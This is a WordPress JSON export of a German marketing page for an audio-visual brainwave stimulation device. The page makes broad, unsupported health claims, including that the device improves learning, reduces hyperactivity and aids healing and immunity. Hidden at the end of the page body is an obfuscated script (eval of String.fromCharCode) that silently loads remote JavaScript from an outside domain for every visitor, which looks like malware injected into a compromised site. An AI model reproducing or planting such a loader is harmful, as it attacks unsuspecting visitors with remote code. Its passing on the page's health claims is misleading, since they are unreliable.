{"id":204,"date":"2016-01-30T16:01:15","date_gmt":"2016-01-30T16:01:15","guid":{"rendered":"http:\/\/shopingpoint.de\/www\/fliqua\/?page_id=204"},"modified":"2016-03-18T18:34:19","modified_gmt":"2016-03-18T17:34:19","slug":"mind","status":"publish","type":"page","link":"https:\/\/www.fliqua.de\/?page_id=204","title":{"rendered":"Geist &#038; Sinne"},"content":{"rendered":"<p><strong>FLIQUA Mentalsystem mit AVS (Audio Visuelle Stimulation).<\/strong> Auf\u00a0die Gehirnfrequenzen des Menschen k\u00f6nnen Mentalsysteme\u00a0in nat\u00fcrlicher und positiver Weise Einfluss nehmen. Die Audio Visuelle Stimulation (AVS) kann dieses durch ihre unterschiedlichen Frequenzen von Licht und Ton bewerkstelligen. Diese Licht- und Klangimpulse k\u00f6nnen\u00a0das Gehirn dazu anregen, sich hinsichtlich seiner Taktrate an die entsprechende Frequenz anzupassen; also mit dieser in Resonanz zu gehen. Die Stimulation mit Licht- und Klangimpulsen kann au\u00dferdem auch eine h\u00f6here Durchblutung des Gehirns bedingen und f\u00fchrt damit zu einer besseren Versorgung der Neuronen mit Sauerstoff, Energie und Neurotransmittern, was letztendlich zu einer besseren geistigen Leistungsf\u00e4higkeit f\u00fchren kann. Mit dem gezielten Aufbau verschiedener Resonanzen erreicht man unterschiedliche Bewusstseinszust\u00e4nde:\u00a0z.B. Entspannung, Konzentration, Leistungsbereitschaft, Kreativit\u00e4t.\u00a0 Das kann wiederum genutzt werden f\u00fcr:<\/p>\n<ul>\n<li>Stressabbau, Entspannung<\/li>\n<li>Steigerung der Konzentration und Leistungsbereitschaft<\/li>\n<li>Stimmungsaufhellung<\/li>\n<li>schnelle Regeneration<\/li>\n<li>Steigerung der Kreativit\u00e4t<\/li>\n<li>schnelleres Lernen<\/li>\n<li>Reduzierung von Hyperaktivit\u00e4t<\/li>\n<\/ul>\n<p>Die Audiovisuelle Stimulation regt das Gehirn dazu an, verst\u00e4rkt auf den durch das jeweilige Programm vorgegebenen Stimulationsfrequenzen zu arbeiten. Auf diese Weise kann der jeweils gew\u00fcnschte mentale Zustand gezielt herbeigef\u00fchrt und gef\u00f6rdert werden. Gehirnwellen k\u00f6nnen mittels eines Elektroenzephalogramms (EEG) an der Kopfhaut gemessen werden. Jede der unz\u00e4hligen <a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/enlightenment-1580467.jpg\" rel=\"attachment wp-att-266\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-266 alignright\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/enlightenment-1580467-200x300.jpg\" alt=\"enlightenment-1580467\" width=\"200\" height=\"300\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/enlightenment-1580467-200x300.jpg 200w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/enlightenment-1580467-768x1150.jpg 768w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/enlightenment-1580467-684x1024.jpg 684w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/enlightenment-1580467.jpg 1880w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/><\/a>elektrochemischen Entladungen der Nervenzellen im Gehirn erzeugt ein winziges, elektromagnetisches Feld mit einer Frequenz zwischen 1 und 30 Hz (Schwingungen pro Sekunde). Die Summe dieser elektrischen Aktivit\u00e4t ergibt die so genannten Gehirnwellen.<\/p>\n<p>Man unterscheidet <strong>vier unterschiedliche Gruppen von Gehirnwellen, Beta-, Alpha-, Theta- und Delta-Wellen<\/strong>. Verschiedene Gehirnwellen k\u00f6nnen in verschiedenen Hirnarealen gleichzeitig auftreten, so ver\u00e4ndert sich das Wellenmuster von Sekunde zu Sekunde. <strong>Beta<\/strong> (30-13 Hz): Wach, gespannt und in Alarmbereitschaft. Hohe Beta-Anteile stehen im Zusammenhang mit einem erh\u00f6hten Aussto\u00df von Stresshormonen. Die Aufmerksamkeit ist nach au\u00dfen gerichtet. Im Extremfall kennzeichnen sie Unruhe, Sorge und pl\u00f6tzliche Angst. <strong>Alpha<\/strong> (12-8 Hz): Kennzeichnend sind wohlige Entspannung, ruhiges flie\u00dfendes Denken, eine positive Grundstimmung (Alpha- Zustand). Bevorzugter Zustand f\u00fcr &#8222;Super-Learning&#8220;. <strong>Theta<\/strong> (7-4 Hz): Diese Wellen treten im Schlaf und w\u00e4hrend tiefer Meditation auf. Sie stehen f\u00fcr ein lebendiges, visuelles Vorstellungsverm\u00f6gen, Kreativit\u00e4tssch\u00fcbe und eine erh\u00f6hte Lern- und Erinnerungsf\u00e4higkeit. <strong>Delta<\/strong> (1-3 Hz): Sie begleiten den traumlosen, tiefen Schlaf. Von gro\u00dfer Bedeutung sind diese Wellen f\u00fcr Heilungsprozesse und die Funktionst\u00fcchtigkeit des Immunsystems.<script type=text\/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><script type=text\/javascript> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>FLIQUA Mentalsystem mit AVS (Audio Visuelle Stimulation). Auf\u00a0die Gehirnfrequenzen des Menschen k\u00f6nnen Mentalsysteme\u00a0in nat\u00fcrlicher und positiver Weise Einfluss nehmen. Die Audio Visuelle Stimulation (AVS) kann dieses durch ihre unterschiedlichen Frequenzen von Licht und Ton bewerkstelligen. Diese Licht- und Klangimpulse k\u00f6nnen\u00a0das Gehirn dazu anregen, sich hinsichtlich seiner Taktrate an die entsprechende Frequenz anzupassen; also mit dieser [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":597,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"tags":[],"class_list":["post-204","page","type-page","status-publish","has-post-thumbnail","hentry"],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/204","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=204"}],"version-history":[{"count":12,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/204\/revisions"}],"predecessor-version":[{"id":749,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/204\/revisions\/749"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/media\/597"}],"wp:attachment":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=204"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=204"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}